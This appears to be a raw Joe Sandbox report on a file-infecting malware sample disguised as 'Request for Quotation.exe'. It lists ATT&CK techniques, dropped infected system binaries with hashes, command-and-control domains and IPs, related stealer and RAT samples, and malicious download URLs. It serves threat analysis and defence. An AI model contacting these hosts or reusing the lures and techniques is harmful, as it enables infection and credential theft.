Source: C:\Windows\System32\FXSSVC.exe | Queries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\Queue\TST5FFB.tmp VolumeInformation
Source: C:\Windows\System32\FXSSVC.exe | Queries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\TST600C.tmp VolumeInformation
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\perfhost.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\Spectrum.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\OpenSSH\ssh-agent.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\AppVClient.exeCode function: 6_2_00C50080 VirtualFree,VirtualFree,VirtualAlloc,GetUserNameW,GetComputerNameW,GetComputerNameW,6_2_00C50080

Stealing of Sensitive Information

Source: Yara match | File source: 19.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000013.00000002.2017731706.0000000003310000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.2016638909.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match | File source: 19.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000013.00000002.2017731706.0000000003310000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.2016638909.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix (rendered as an interactive grid in the original; the grid's unflagged filler cells and numeric match-count badges are omitted here). Tactic columns: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact. Techniques flagged for this sample:

• Execution: Service Execution, Native API
• Persistence: Windows Service, LSASS Driver, DLL Side-Loading
• Privilege Escalation: Windows Service, Process Injection, Abuse Elevation Control Mechanism, LSASS Driver, DLL Side-Loading
• Defense Evasion: Masquerading, Virtualization/Sandbox Evasion, Process Injection, Deobfuscate/Decode Files or Information, Abuse Elevation Control Mechanism, Obfuscated Files or Information, Software Packing, Timestomp, DLL Side-Loading
• Discovery: Security Software Discovery, Virtualization/Sandbox Evasion, Process Discovery, Application Window Discovery, Account Discovery, System Owner/User Discovery, System Information Discovery
• Lateral Movement: Taint Shared Content
• Collection: Archive Collected Data
• Command and Control: Encrypted Channel, Non-Application Layer Protocol, Application Layer Protocol
Behavior Graph (ID: 1572510; Sample: Request for Quotation.exe; Startdate: 10/12/2024; Architecture: WINDOWS; Score: 100). The original renders this as a graph; the recoverable nodes and edges are:

• Sample level: domains zlenh.biz, uhxqin.biz and 4 other IPs or domains; signatures: Suricata IDS alerts for network traffic, Antivirus detection for dropped file, Antivirus / Scanner detection for submitted sample, 9 other signatures.
• Request for Quotation.exe (started): contacts ssbzmoy.biz (18.141.10.107, 49732, 49733, 49744, AMAZON-02US, United States) and pywolwnvd.biz (54.244.188.177, 49730, 49731, 49734, AMAZON-02US, United States); dropped C:\Windows\System32\snmptrap.exe (PE32+), C:\Windows\System32\msiexec.exe (PE32+), C:\Windows\System32\msdtc.exe (PE32+) and 15 other malicious files; signatures: Binary is likely a compiled AutoIt script file, Writes to foreign memory regions, Maps a DLL or memory area into another process, 2 other signatures; starts svchost.exe.
• AppVClient.exe (started): dropped C:\Windows\System32\...\398ce0ec3b45a4be.bin (COM); signatures: Antivirus detection for dropped file, Creates files in the system32 config directory, Machine Learning detection for dropped file.
• Spectrum.exe (started): signature: Contains functionality to behave differently if execute on a Russian/Kazak computer.
• 15 other processes (started): signature: Found direct / indirect Syscall (likely to bypass EDR).

Source | Detection | Scanner | Label
Request for Quotation.exe | 82% | ReversingLabs | Win32.Virus.Expiro
Request for Quotation.exe | 100% | Avira | W32/Infector.Gen
Request for Quotation.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | 100% | Avira | W32/Infector.Gen
C:\Windows\System32\Spectrum.exe | 100% | Avira | W32/Infector.Gen
C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe | 100% | Avira | W32/Infector.Gen
C:\Windows\System32\snmptrap.exe | 100% | Avira | W32/Infector.Gen
C:\Windows\System32\msiexec.exe | 100% | Avira | W32/Infector.Gen
C:\Windows\System32\SensorDataService.exe | 100% | Avira | W32/Infector.Gen
C:\Windows\System32\AppVClient.exe | 100% | Avira | W32/Infector.Gen
C:\Windows\System32\msdtc.exe | 100% | Avira | W32/Infector.Gen
C:\Windows\System32\Locator.exe | 100% | Avira | W32/Infector.Gen
C:\Windows\SysWOW64\perfhost.exe | 100% | Avira | W32/Infector.Gen
C:\Windows\System32\OpenSSH\ssh-agent.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe | 100% | Avira | W32/Infector.Gen
C:\Windows\System32\FXSSVC.exe | 100% | Avira | W32/Infector.Gen
C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe | 100% | Avira | W32/Infector.Gen
C:\Windows\System32\alg.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | 100% | Joe Sandbox ML |
C:\Windows\System32\Spectrum.exe | 100% | Joe Sandbox ML |
C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe | 100% | Joe Sandbox ML |
C:\Windows\System32\snmptrap.exe | 100% | Joe Sandbox ML |
C:\Windows\System32\msiexec.exe | 100% | Joe Sandbox ML |
C:\Windows\System32\SensorDataService.exe | 100% | Joe Sandbox ML |
C:\Windows\System32\AppVClient.exe | 100% | Joe Sandbox ML |
C:\Windows\System32\msdtc.exe | 100% | Joe Sandbox ML |
C:\Windows\System32\Locator.exe | 100% | Joe Sandbox ML |
C:\Windows\SysWOW64\perfhost.exe | 100% | Joe Sandbox ML |
C:\Windows\System32\OpenSSH\ssh-agent.exe | 100% | Joe Sandbox ML |
C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe | 100% | Joe Sandbox ML |
C:\Windows\System32\FXSSVC.exe | 100% | Joe Sandbox ML |
C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe | 100% | Joe Sandbox ML |
C:\Windows\System32\alg.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | 100% | Joe Sandbox ML |
          No Antivirus matches
          No Antivirus matches
Source | Detection | Scanner | Label
http://54.244.188.177:80/miswwsapbqmsir&&$ | 0% | Avira URL Cloud | safe
http://54.244.188.177/1 | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ssbzmoy.biz | 18.141.10.107 | true | false | | high
fwiwk.biz | 172.234.222.138 | true | false | | high
pywolwnvd.biz | 54.244.188.177 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
http://vcddkls.biz/ytpebbldheutao | false | | high
http://pywolwnvd.biz/hcwjealfbuy | false | | high
http://pywolwnvd.biz/miswwsapbqmsir | false | | high
http://ssbzmoy.biz/kr | false | | high
http://cvgrf.biz/iropyruplkan | false | | high
http://knjghuig.biz/hgpugagvc | false | | high
http://ssbzmoy.biz/njrv | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://54.244.188.177:80/miswwsapbqmsir&&$ | Request for Quotation.exe, 00000000.00000003.1739856220.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1759386922.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1748580757.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1744146667.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1758403499.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1747429848.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1741441665.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1744762476.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1757640309.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1741023686.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1743658598.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1746039694.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1740158447.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1742733827.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1740677014.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1743149995.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1745556871.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1746541463.0000000000E72000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffDilithium2Dilith | elevation_service.exe.0.dr | false | | high
http://54.244.188.177/ | Request for Quotation.exe, 00000000.00000003.1737413561.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1745556871.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1743658598.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1744762476.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1759386922.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1743149995.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1757640309.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ff | elevation_service.exe.0.dr | false | | high
http://18.141.10.107/ | Request for Quotation.exe, 00000000.00000003.1768862555.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://54.244.188.177/1 | Request for Quotation.exe, 00000000.00000003.1768862555.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1759829685.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1758403499.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1767780343.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1759386922.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1757640309.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
54.244.188.177 | pywolwnvd.biz | United States | 16509 | AMAZON-02US | false
18.141.10.107 | ssbzmoy.biz | United States | 16509 | AMAZON-02US | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1572510
Start date and time: 2024-12-10 16:39:07 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 48s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 23
Number of new started drivers analysed: 3
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Request for Quotation.exe
Detection: MAL
Classification: mal100.spre.troj.expl.evad.winEXE@17/28@5/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 68%
• Number of executed functions: 76
• Number of non-executed functions: 68
Cookbook Comments:
• Found application associated with file extension: .exe
• Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
• Exclude process from analysis (whitelisted): MpCmdRun.exe, DiagnosticsHub.StandardCollector.Service.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.63
• Excluded domains from analysis (whitelisted): przvgke.biz, ww7.przvgke.biz, zlenh.biz, slscr.update.microsoft.com, otelrules.azureedge.net, knjghuig.biz, vjaxhpbji.biz, ctldl.windowsupdate.com, ifsaia.biz, uhxqin.biz, fe3cr.delivery.mp.microsoft.com, cvgrf.biz, ww99.przvgke.biz, ocsp.digicert.com, lpuegx.biz, saytjshyf.biz, xlfhhhm.biz, vcddkls.biz, npukfztj.biz, anpmnmxo.biz
• Not all processes were analyzed; the report is missing behavior information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: Request for Quotation.exe
Time | Type | Description
10:40:06 | API Interceptor | 1x Sleep call for process: Request for Quotation.exe modified
10:40:08 | API Interceptor | 178386x Sleep call for process: perfhost.exe modified
10:40:29 | API Interceptor | 3x Sleep call for process: svchost.exe modified
10:40:44 | API Interceptor | 199x Sleep call for process: msdtc.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
54.244.188.177 | HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | malicious | MassLogger RAT | cvgrf.biz/hfsfqfqbrwib
54.244.188.177 | PURCHASE REQUIRED DETAILS 000487958790903403.exe | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | cvgrf.biz/npdqgsoqmq
54.244.188.177 | RFQ _ Virtue 054451000085.exe | malicious | FormBook | cvgrf.biz/rtjcy
54.244.188.177 | OgkJOmobY7.exe | malicious | FormBook | pywolwnvd.biz/hemfkj
54.244.188.177 | Ziraat_Swift.hta | malicious | MassLogger RAT, PureLog Stealer | pywolwnvd.biz/nwqf
54.244.188.177 | Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe | malicious | AgentTesla, MassLogger RAT, PureLog Stealer | cvgrf.biz/yqmdwhskkjhif
54.244.188.177 | invoice_96.73.exe | malicious | FormBook | lrxdmhrr.biz/tgcwttfqletfhyq
54.244.188.177 | Order SMG 201906 20190816order.pdf.scr.exe | malicious | AgentTesla, MassLogger RAT, PureLog Stealer | rynmcq.biz/msoqwwrwyts
54.244.188.177 | C6dAUcOA6M.exe | malicious | AgentTesla, DBatLoader, PureLog Stealer | rynmcq.biz/qqnj
54.244.188.177 | PO #09465610_GQ 003745_SO-242000846.exe | malicious | MassLogger RAT, PureLog Stealer | pywolwnvd.biz/ksmybghbmbq
18.141.10.107 | HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | malicious | MassLogger RAT | vcddkls.biz/ymdlhl
18.141.10.107 | PURCHASE REQUIRED DETAILS 000487958790903403.exe | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | knjghuig.biz/jedofahyn
18.141.10.107 | RFQ _ Virtue 054451000085.exe | malicious | FormBook | vcddkls.biz/gepvpveyhkiwwmj
18.141.10.107 | Ziraat_Swift.hta | malicious | MassLogger RAT, PureLog Stealer | vcddkls.biz/kf
18.141.10.107 | RFQ_PO N89397-GM7287-Order.bat.exe | malicious | MassLogger RAT, PureLog Stealer | ssbzmoy.biz/j
18.141.10.107 | Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe | malicious | AgentTesla, MassLogger RAT, PureLog Stealer | ssbzmoy.biz/kokmvod
18.141.10.107 | invoice_96.73.exe | malicious | FormBook | acwjcqqv.biz/tgcwttfqletfhyq
18.141.10.107 | Order SMG 201906 20190816order.pdf.scr.exe | malicious | AgentTesla, MassLogger RAT, PureLog Stealer | eufxebus.biz/dw
18.141.10.107 | C6dAUcOA6M.exe | malicious | AgentTesla, DBatLoader, PureLog Stealer | warkcdu.biz/kc
18.141.10.107 | PO #09465610_GQ 003745_SO-242000846.exe | malicious | MassLogger RAT, PureLog Stealer | vcddkls.biz/lyroetjkhx
Match | Associated Sample Name / URL | Detection | Threat Name | Context
fwiwk.biz | RFQ _ Virtue 054451000085.exe | malicious | FormBook | 172.234.222.143
fwiwk.biz | invoice_96.73.exe | malicious | FormBook | 172.234.222.143
fwiwk.biz | Order SMG 201906 20190816order.pdf.scr.exe | malicious | AgentTesla, MassLogger RAT, PureLog Stealer | 172.234.222.143
fwiwk.biz | C6dAUcOA6M.exe | malicious | AgentTesla, DBatLoader, PureLog Stealer | 172.234.222.138
fwiwk.biz | PO #09465610_GQ 003745_SO-242000846.exe | malicious | MassLogger RAT, PureLog Stealer | 172.234.222.143
fwiwk.biz | IBKB.vbs | malicious | AgentTesla, DBatLoader, PureLog Stealer | 172.234.222.143
fwiwk.biz | AENiBH7X1q.exe | malicious | PureLog Stealer, RedLine | 172.234.222.138
fwiwk.biz | Y2EM7suNV5.exe | malicious | MassLogger RAT | 172.234.222.143
ssbzmoy.biz | HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | malicious | MassLogger RAT | 18.141.10.107
ssbzmoy.biz | PURCHASE REQUIRED DETAILS 000487958790903403.exe | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | 18.141.10.107
ssbzmoy.biz | RFQ _ Virtue 054451000085.exe | malicious | FormBook | 18.141.10.107
ssbzmoy.biz | Ziraat_Swift.hta | malicious | MassLogger RAT, PureLog Stealer | 18.141.10.107
ssbzmoy.biz | RFQ_PO N89397-GM7287-Order.bat.exe | malicious | MassLogger RAT, PureLog Stealer | 18.141.10.107
ssbzmoy.biz | Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe | malicious | AgentTesla, MassLogger RAT, PureLog Stealer | 18.141.10.107
ssbzmoy.biz | invoice_96.73.exe | malicious | FormBook | 18.141.10.107
ssbzmoy.biz | Order SMG 201906 20190816order.pdf.scr.exe | malicious | AgentTesla, MassLogger RAT, PureLog Stealer | 18.141.10.107
ssbzmoy.biz | C6dAUcOA6M.exe | malicious | AgentTesla, DBatLoader, PureLog Stealer | 18.141.10.107
ssbzmoy.biz | PO #09465610_GQ 003745_SO-242000846.exe | malicious | MassLogger RAT, PureLog Stealer | 18.141.10.107
pywolwnvd.biz | HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | malicious | MassLogger RAT | 54.244.188.177
pywolwnvd.biz | PURCHASE REQUIRED DETAILS 000487958790903403.exe | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | 54.244.188.177
pywolwnvd.biz | RFQ _ Virtue 054451000085.exe | malicious | FormBook | 54.244.188.177
pywolwnvd.biz | OgkJOmobY7.exe | malicious | FormBook | 54.244.188.177
pywolwnvd.biz | Ziraat_Swift.hta | malicious | MassLogger RAT, PureLog Stealer | 54.244.188.177
pywolwnvd.biz | Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe | malicious | AgentTesla, MassLogger RAT, PureLog Stealer | 54.244.188.177
pywolwnvd.biz | invoice_96.73.exe | malicious | FormBook | 54.244.188.177
pywolwnvd.biz | Order SMG 201906 20190816order.pdf.scr.exe | malicious | AgentTesla, MassLogger RAT, PureLog Stealer | 54.244.188.177
pywolwnvd.biz | C6dAUcOA6M.exe | malicious | AgentTesla, DBatLoader, PureLog Stealer | 54.244.188.177
                                      Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                      Match: AMAZON-02 US
                                      Sample: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe; Detection: malicious; Threat Name: MassLogger RAT
                                      • 18.141.10.107
                                      URL: http://abercombie.com; Detection: malicious; Threat Name: Unknown
                                      • 3.160.188.18
                                      URL: https://d3tl5rwi83n7i8.cloudfront.net/BMGe2dUrJpyz.exe; Detection: malicious; Threat Name: Unknown
                                      • 13.227.9.131
                                      URL: https://districtwharfoffices.com/l/home; Detection: malicious; Threat Name: Unknown
                                      • 3.164.182.25
                                      URL: https://wetransfer.com/downloads/a83584fea59b11ef1e94d36869e8790020241209234540/89744b9472f9ce1b5e3b4ada79f2184c20241209234540/7041ff?t_exp=1734047140&t_lsid=42d44d78-6d8f-48db-8db5-5efa0c86786d&t_network=email&t_rid=ZW1haWx8Njc0ZjQ5YTNiNjM1NTFjNmY2NTg0N2Zj&t_s=download_link&t_ts=1733787940&utm_campaign=TRN_TDL_01&utm_source=sendgrid&utm_medium=email&trk=TRN_TDL_01; Detection: malicious; Threat Name: Unknown
                                      • 13.227.2.22
                                      URL: https://zfrmz.com/wE0Jw9HNvGeKZ1fn5cBU; Detection: malicious; Threat Name: Unknown
                                      • 108.158.75.129
                                      Sample: Product Blueprint..html; Detection: malicious; Threat Name: HTMLPhisher
                                      • 76.223.111.18
                                      Sample: xUPaeKk5wQ.msi; Detection: malicious; Threat Name: AteraAgent
                                      • 13.232.67.198
                                      Sample: 7gBUqzSN3y.msi; Detection: malicious; Threat Name: AteraAgent
                                      • 13.232.67.199
                                      Sample: MAERSK LINE SHIPPING DOC_4253.exe; Detection: malicious; Threat Name: FormBook
                                      • 13.228.81.39
                                      No context
                                      No context
                                      Process:C:\Users\user\Desktop\Request for Quotation.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1658880
                                      Entropy (8bit):4.312984811440721
                                      Encrypted:false
                                      SSDEEP:24576:ixGBcmlnVg9N9JMlDlfjRiVuVsWt5MJMs:qGy+VgFIDRRAubt5M
                                      MD5:68F239C01813FB34CDEBECC73B16EDE9
                                      SHA1:DBA884204162633DA912CF9000EBAA6651EFCA91
                                      SHA-256:B842AB1BFBF29B735BE715C3B31BAD26BAFEC701C386AC39CDF0CB3B02F47B3E
                                      SHA-512:D5430D02FB31BAAEF6ABB721CA04CEA6EE881B16FA39E78836BC3157CED5636C93BF3C366FC0F1884266F47FB915711743A6ECC3FAC67D4DA7EC9D2524731D1D
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Reputation:low
                                      Process:C:\Users\user\Desktop\Request for Quotation.exe
                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):2354176
                                      Entropy (8bit):7.049191490015536
                                      Encrypted:false
                                      SSDEEP:49152:ThDdVrQ95RW0YEHyWQXE/09Val0GPgFIDRRAubt5M:ThHYW+HyWK3Uf
                                      MD5:50E9A4F9451FF8D2C576BF053A02B0D7
                                      SHA1:01AF1F4F0FC6FD23A309400E5CC10D20BBA86747
                                      SHA-256:D40E9935AECB1300FA5E66110F68E93C367C2960EDCE021D5347EDA6C31F6C3F
                                      SHA-512:D4905C9879833EED4ADA46450F5CC4107640EF6558CA92B2C10552F7FE742536D336F46260359812121697D2AA1E6B69D41F2CA8D6776DAFB587E8CF6522D4EC
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Process:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):3141
                                      Entropy (8bit):4.817156740410215
                                      Encrypted:false
                                      SSDEEP:24:lDEdwDirD9DADZ4DPDBRzDTWtFDqDTWmIFDQ1DKD9DLuDdD7DTWqFDGvDfxDTWlX:6+CRK9mB+R78a5qoBxnqD
                                      MD5:C4386C23BACFA2B7784094B6D17CAE12
                                      SHA1:7F3D19337D452927B7FE1DBF20A65B65108A47DC
                                      SHA-256:A39C9EA8AB490613D3D241899C56DA5DA5C772BD584835C42482EF8311D4220E
                                      SHA-512:6CD91254AA9884651D9159B2FD1AEE4CE5146A8E1D00F128A3613C66B889EC43A6E86169C5BC103E9824918640B5BCDB8B4AA63EA86E6C52764AF6F42AF05FDB
                                      Malicious:false
                                      Preview:2024-12-10 10:40:07-0500: Disabled unneeded token privilege: SeAssignPrimaryTokenPrivilege...2024-12-10 10:40:07-0500: Disabled unneeded token privilege: SeAuditPrivilege...2024-12-10 10:40:07-0500: Disabled unneeded token privilege: SeBackupPrivilege...2024-12-10 10:40:07-0500: Disabled unneeded token privilege: SeCreateGlobalPrivilege...2024-12-10 10:40:07-0500: Disabled unneeded token privilege: SeCreatePagefilePrivilege...2024-12-10 10:40:07-0500: Disabled unneeded token privilege: SeCreatePermanentPrivilege...2024-12-10 10:40:07-0500: Disabled unneeded token privilege: SeCreateSymbolicLinkPrivilege...2024-12-10 10:40:07-0500: Could not disable token privilege value: SeCreateTokenPrivilege. (1300)..2024-12-10 10:40:07-0500: Disabled unneeded token privilege: SeDebugPrivilege...2024-12-10 10:40:07-0500: Could not disable token privilege value: SeEnableDelegationPrivilege. (1300)..2024-12-10 10:40:07-0500: Disabled unneeded token privilege: SeImpersonatePrivilege...2024-12-10 10:40:0
                                      Process:C:\Users\user\Desktop\Request for Quotation.exe
                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):1725440
                                      Entropy (8bit):4.412503831257309
                                      Encrypted:false
                                      SSDEEP:24576:kQVTZu0JnVg9N9JMlDlfjRiVuVsWt5MJMs:bVTZumgFIDRRAubt5M
                                      MD5:3F3BEE4315081168FC542419E2F2D1A6
                                      SHA1:D7801E335A26B8183FD340D04E0DB7206D43DE82
                                      SHA-256:BEB100F95D5008A8F2493893EB4080B9B64C0F1EBE12A0644A213E4C301112A4
                                      SHA-512:A1F042BDC7CFE37E9EA8ABE1E9394CCB11A34644285C2FABB5D71688D853FC250604948CB2204E9F9ED3F44AF730C70E29E8A183C9AB1C8E0C3981ED6D9C9940
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Process:C:\Users\user\Desktop\Request for Quotation.exe
                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):2370560
                                      Entropy (8bit):7.031534525044303
                                      Encrypted:false
                                      SSDEEP:49152:RAMsOu3JfCIGnZuTodRFYKBrFDbWpBgFIDRRAubt5M:RAMa38ZuTSzUf
                                      MD5:3E95F175A0243E5401D22AE69D9D681C
                                      SHA1:5898351AB7FDBE9B9ACF83DCDDB117034799D5EE
                                      SHA-256:34B14B2B411586CBE1102F9EFBF06FB1B081B498A410AA6A8158F73957553115
                                      SHA-512:B830759971D3C89AC40CCB7B34B90AB270DFB4EE27A16FF08C9F730B266AA47AC3A57DF6BECC6823CECA2C9DD428D7848E0111B63714F3C41A840C1A12127E47
                                      Malicious:true
                                      Process:C:\Users\user\Desktop\Request for Quotation.exe
                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):1710592
                                      Entropy (8bit):4.310738880324589
                                      Encrypted:false
                                      SSDEEP:24576:Ef8HQl9MxHwJ07wEVg9N9JMlDlfjRiVuVsWt5MJMs:EkHQlYwJ01gFIDRRAubt5M
                                      MD5:98F9ADB0B46A5E405062C81E0D2ED96D
                                      SHA1:583A0E4D680A0C4A38AF93323554C93AD736D517
                                      SHA-256:C9C97076F4560DE548287BB34E1A769789DD562ECA4E425441D78F3800267F8E
                                      SHA-512:A97F551926BBF7240B432B6B4FDD1D6DC83024B0BDF52BF89FDD29B9407D39C7062F9115BC0F79DC24486F3FEECE1ABC42CAD9D757923F7E9939BC81D3ADF18B
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Process:C:\Users\user\Desktop\Request for Quotation.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):289280
                                      Entropy (8bit):7.995655378638414
                                      Encrypted:true
                                      SSDEEP:6144:Hy4uUHLoooA6tLUmemiVZLBSLPDDIVtdbKPg53sy:HyMX6tLqTSHDIBB5V
                                      MD5:9B64BD4C4C4C1E2AF631B9D0785F0E31
                                      SHA1:DCC3811E3B2B85D3CC2857D94A04F7CD7A87479C
                                      SHA-256:AFEC7CAEEA82EE22D62B30C6A3EAC9375716BC03BF059C5C51603441B15B6765
